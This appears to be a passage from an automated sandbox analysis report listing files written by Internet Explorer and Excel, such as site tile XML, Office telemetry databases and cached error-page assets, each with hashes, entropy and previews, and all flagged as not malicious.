                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x352a0cad,0x01d659c0</date><accdate>0x352a0cad,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x352a0cad,0x01d659c0</date><accdate>0x352cbb2f,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):661
                                                                                                                                      Entropy (8bit):5.138695579209784
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:EE82D6A3603ABA2ACAD2A9125A420E29
                                                                                                                                      SHA1:F086257CD15813744C85BC2698A996BDE79F3583
                                                                                                                                      SHA-256:BFB183EC7F2E73725D8AF88A99203195A9C5FD9A8C4E42572C48D9DBA66B5D25
                                                                                                                                      SHA-512:5DFBD804FC4A4562F588410B8D8C2C8967450A5C769CEE070B68E605DB045A5ABBD75D4CF177B5E677DAA82C16A01FDBEAF131D43DE7194AD59758C31E842CAF
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3541255e,0x01d659c0</date><accdate>0x3541255e,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x3541255e,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-314712940\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):409
                                                                                                                                      Entropy (8bit):5.187125655806997
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:015240C46BA32FA0CA487C865E1431A2
                                                                                                                                      SHA1:2FE6821AF813AD597EE4828730B4DED3BDA37F8F
                                                                                                                                      SHA-256:087BC6880582883B642995991B1433D7EC3D2010361A9825E7AC33425D0A44D6
                                                                                                                                      SHA-512:242E3EE024CFA04C7713B6BB75256AD2CC3EFA61CE7AEFC969B88FE92D03DBECCD42A91CCC90EA7C59199AA8CBBAC6A48896D0A672884B15B70AD42D8A7E2D8B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0xbb41d6e3,0x01d5fd35</date><accdate>0x352f439b,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/><selection>\lowres.png</selection></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):646
                                                                                                                                      Entropy (8bit):5.115653536992936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:A2E5D1E6085D51AEE4F0CC0A95BC6EE4
                                                                                                                                      SHA1:63417B7B244E171B85FC5F88DBC0EE26EE9EB102
                                                                                                                                      SHA-256:7847032C85585F3A0DF20C3C9D888C844692F19B2253652A192473A4A0639533
                                                                                                                                      SHA-512:AA2CC6491BC61D6A2081CF80B99D7229D21C854228F7C663634C04B2D098A6FF039F7186A77139167AA9400402AAEC000D3782A1A7957EAECFC9D9CCF9221AD6
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.14338115265285
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:E38D69CE45137FC5FE26581B083027FD
                                                                                                                                      SHA1:974B92D18AE0199ACE7B019535495663BDACA608
                                                                                                                                      SHA-256:D7B0AF5554A9DCBB6982F33939A58ECE184BB67F59252E709A349BC5B51BCF22
                                                                                                                                      SHA-512:270DEFA95ADA75CB17F7B524FBC4FA1446CC9DF763610377E8280514C1E04D3B716964F7647C9F2571B6C89D07C90C4FAB4D790FAD7E96599728AB6B9163BF96
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.079786636004328
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:11D97AC38949F625E1964DA51A3A31C0
                                                                                                                                      SHA1:A191A76753400755A6699F151F8F5FC308EA3034
                                                                                                                                      SHA-256:E817B5D4BD6395C38F855A9F30C9D36E08D013DB644A9418D8CAA37708C07C29
                                                                                                                                      SHA-512:3A664F83F4A6CDDF6E6CD65AF0F6C72EB78415CC959E9FBEC8B17217F22E200C0E37A0AEB247B5E68F97AE8479A454F500C181EE626DEB805002B590815C7603
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35399eea,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35399eea,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.137119220625062
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:222CC3B5FA44DB9D01378F4745BF47CD
                                                                                                                                      SHA1:F2AB0F990AF67F6AE3C71D8FFD459A9BDF216235
                                                                                                                                      SHA-256:32F6F14B0900F819C0162ECE7E9287B32C93D548164226FD2B68BAA34645ED78
                                                                                                                                      SHA-512:2D14D3473ACA42FAEFCD404835A42AD3DA88B796738B5B50CD9CD2B382C63178FD582FAE90E646FC615E9440145EA51BBFD7D7968F69A2943B15F1A29E46145D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35371671,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35371671,0x01d659c0</date><accdate>0x35399eea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):658
                                                                                                                                      Entropy (8bit):5.129058085584826
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:79B3DDD289E625C7010547821530BD87
                                                                                                                                      SHA1:F834898D25BFAE7F50BA2E40F768B3DE2A2C32C4
                                                                                                                                      SHA-256:A941E6505785794ABA37DDF275243075F50999F5B9C246871F897DE5BC55FDE3
                                                                                                                                      SHA-512:16232CC5BA7B1D59D21E4DA547997E7D097B7CAE8256FD40C1D64BC84BF61E5EAC43A14C14058FBF2906CDACCE997D8FCCD681021129B58167B366C2E89FC82D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x3531f250,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):5.104828222498662
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:EE3E059BB77CFF55DB081B18727BD08F
                                                                                                                                      SHA1:66D03CBD7A40F8766CD766F728B3D92DBB11311D
                                                                                                                                      SHA-256:CF481CD6BAB34B7AF476B924FC8430B22F418CF9DFD1E5D9F3D62CAAD9E1DFFC
                                                                                                                                      SHA-512:A1E49AD4A5E73EE41CC48927C969A88EE7DE03E1BEA327A41F5069CB61FD08BF356D609BD917B83FEC92C69D1F4612DA540BC89A4057D8BB56115EA5DC3BFC3A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x35348e01,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x35348e01,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D5DED82E-F14D-4C75-B211-3C8926E9C5FD
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):127847
                                                                                                                                      Entropy (8bit):5.377163921068166
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C685E09A8C912131ACE9DDF33E9255EF
                                                                                                                                      SHA1:F4C4A2C1BBDF7D27C14A41C0FB066A7F0567561B
                                                                                                                                      SHA-256:87EB66ACB63999A5E89A7E2AA89E616F6554C34AE07ABF2F0B62717E28018A68
                                                                                                                                      SHA-512:67402437C3AD56530589CFEB503ECA8122AA260C6711FDC2A1B34A95CCECA906274C70A9507E7BD786C92F434AEC3CCDB13AA3212408E61EAE8F1A4623D8F130
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-07-14T09:20:13">.. Build: 16.0.13113.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with no line terminators
                                                                                                                                      Size (bytes):412027
                                                                                                                                      Entropy (8bit):5.105190603444391
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5F2A0C5CE21462BA3620A02E887FE38F
                                                                                                                                      SHA1:F55BE2197E8A76192D29AE68D0E25BAD8BF144E1
                                                                                                                                      SHA-256:F1E6977EE28764F50918828603EBD1CE27A4151349DEB6099C269447D950DB57
                                                                                                                                      SHA-512:D7582E9DFE8461C428C922000C8A5B287CD4D4F484353A65242779B04BA9D2B4DFA0A528F4FC3AD60FFA0E57BD2835D5A6ECBDFD5C68E0CCAA7F9863DF1E5C0D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2" F="Warning" /></C><C
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                      Size (bytes):4152
                                                                                                                                      Entropy (8bit):1.1815294385240924
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:1E22250ACB0B4FB9C4A3575D2E1F3206
                                                                                                                                      SHA1:0FC624A6316C2BA82BDC42F0E97AE5034C939397
                                                                                                                                      SHA-256:5FBA0F19217C8F7ED18B0B7D0537748273498D4C6FE4C769EDDB582EB93697ED
                                                                                                                                      SHA-512:AD9659F226917D0D6F83E7A1A481E2CBCC88B74BEAF6AE5C8A3691C56A1BFF77DE20741D548CE9C81490A5F9033F456E6BC7DB04792412AF6F56ED7990643A28
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 7....-..........&.[...._}B.9...........&.[...._.'...Y.SQLite format 3......@ ..................................................................................d....d.g..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3019003
                                                                                                                                      Size (bytes):12288
                                                                                                                                      Entropy (8bit):0.9279194729410528
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:385FD397FD2A30DB81F51FDBD4F72A8D
                                                                                                                                      SHA1:B5E7B3E0068E5E9C5B566ADE807F89718B32BD8A
                                                                                                                                      SHA-256:F93484A630FFAE446B7566FB0F70C4EEE8E38D61FE4F81ECC75653C95B0EFACA
                                                                                                                                      SHA-512:5F86841C97AA3D4E190353E80B2C9114631DED1579BFB242CABBF55A8F1EE05421E8C0834A839E38F94F1B3CE920D4B7C7ED7921E1808CC38D1DF08EDD8DDD00
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: SQLite format 3......@ ..................................................................................d....d.g......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session-journal
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Size (bytes):13360
                                                                                                                                      Entropy (8bit):0.9060517234041621
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:37A9F843D3EF794F1DEAF6AEA68A9B18
                                                                                                                                      SHA1:449EDF0A5EF4FEE0FF0E13C512D0C9AD95BE0D13
                                                                                                                                      SHA-256:5372A91D5338788C27DE27B570FA79FDD53E57927E6A531F3EB5014A08084FB5
                                                                                                                                      SHA-512:1FCFA38D645CE0360144A8F990E5254D1D7D08CC5412E91BD7377F75A0009A7A50BAD5DC393D2B5AB6DCA7ACF7C6CF3F1C3C47044842484837C5631EC1F58B70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............vZ.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..................................................................................d....d.g..................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                      SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\down[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):748
                                                                                                                                      Entropy (8bit):7.249606135668305
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                      SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                      SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                      SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                      Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\A5VQ85FW\errorPageStrings[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):4720
                                                                                                                                      Entropy (8bit):5.164796203267696
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                      SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                      SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                      SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                      Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\ErrorPageTemplate[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                      Size (bytes):2168
                                                                                                                                      Entropy (8bit):5.207912016937144
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                      SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                      SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                      SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                      Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\J7EK2SLI\bullet[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                      Size (bytes):447
                                                                                                                                      Entropy (8bit):7.304718288205936
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                      SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                      SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
